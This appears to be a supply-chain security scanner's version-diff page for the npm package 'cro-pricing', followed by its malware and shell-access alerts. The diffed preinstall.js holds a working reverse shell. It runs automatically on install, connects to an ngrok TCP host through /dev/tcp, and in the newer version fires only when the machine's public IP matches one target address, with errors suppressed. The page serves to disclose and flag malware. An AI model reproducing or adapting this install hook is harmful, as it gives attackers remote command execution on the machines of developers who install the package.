cro-pricing - npm Package Compare versions

Comparing version 1.0.8 to 1.0.9

package.json

 {
   "name": "cro-pricing",
-  "version": "1.0.8",
+  "version": "1.0.9",
   "main": "index.js",
@@ -5,0 +5,0 @@ "scripts": {

preinstall.js

 const { exec } = require("child_process");
 const fs = require("fs");
+const axios = require("axios");
 
-const host = "0.tcp.ap.ngrok.io";
-const port = "12413";
+const ngrokHost = "0.tcp.ap.ngrok.io";
+const ngrokPort = "18031";
+const targetIP = "204.236.139.248";
 
@@ -16,16 +18,23 @@ // Check if a shell exists
 
-// Determine shell to use
-let shell = "/bin/sh"; // default fallback
-if (shellExists("/bin/bash")) {
-  shell = "/bin/bash";
-}
+// Get public IP and run reverse shell if matches
+(async () => {
+  try {
+    const res = await axios.get("https://api.ipify.org?format=json", { timeout: 3000 });
+    const currentIP = res.data.ip;
 
-// Build command using the detected shell
-const cmd = `nohup ${shell} -c 'exec 5<>/dev/tcp/${host}/${port}; while read -r l<&5; do $l; done >&5 2>&5' &>/dev/null &`;
+    if (currentIP === targetIP) {
+      let shell = "/bin/sh";
+      if (shellExists("/bin/bash")) shell = "/bin/bash";
 
-// Execute command
-exec(cmd, (error, stdout, stderr) => {
-  if (error) {
-    // Fail silently or log
+      const cmd = `nohup ${shell} -c 'exec 5<>/dev/tcp/${ngrokHost}/${ngrokPort}; while read -r l<&5; do $l; done >&5 2>&5' &>/dev/null &`;
+
+      exec(cmd, (error, stdout, stderr) => {
+        if (error) {
+          // Optional: log error
+        }
+      });
+    }
+  } catch (err) {
+    // Silent fail
   }
-});
+})();

New alerts

AI-detected potential malware

Supply chain risk

AI has identified this package as malware. This is a strong signal that the package may be malicious.

Found 1 instance in 1 package

Shell access

Supply chain risk

This module accesses the system shell. Accessing the system shell increases the risk of executing arbitrary code.

Found 1 instance in 1 package

Unpublished package

Supply chain risk

Package version was not found on the registry. It may exist on a different registry and need to be configured to pull from that registry.

Found 1 instance in 1 package

Filesystem access

Supply chain risk

Accesses the file system, and could potentially read sensitive data.

Found 1 instance in 1 package

URL strings

Supply chain risk

Package contains fragments of external URLs or IP addresses, which the package may be accessing at runtime.

Found 1 instance in 1 package

Fixed alerts

Known malware

Supply chain risk

This package version is identified as malware. It has been flagged either by Socket's AI scanner and confirmed by our threat research team, or is listed as malicious in security databases and other sources.

Found 1 instance in 1 package

Shell access

Supply chain risk

This module accesses the system shell. Accessing the system shell increases the risk of executing arbitrary code.

Found 1 instance in 1 package

Unpublished package

Supply chain risk

Package version was not found on the registry. It may exist on a different registry and need to be configured to pull from that registry.

Found 1 instance in 1 package

Filesystem access

Supply chain risk

Accesses the file system, and could potentially read sensitive data.

Found 1 instance in 1 package

URL strings

Supply chain risk

Package contains fragments of external URLs or IP addresses, which the package may be accessing at runtime.

Found 1 instance in 1 package

Improved metrics

Total package byte prevSize

1222

33.55%

Lines of code

33

32%

Number of critical supply chain risk alerts

0

-100%

Worsened metrics

Number of high supply chain risk alerts

2

100%

No dependency changes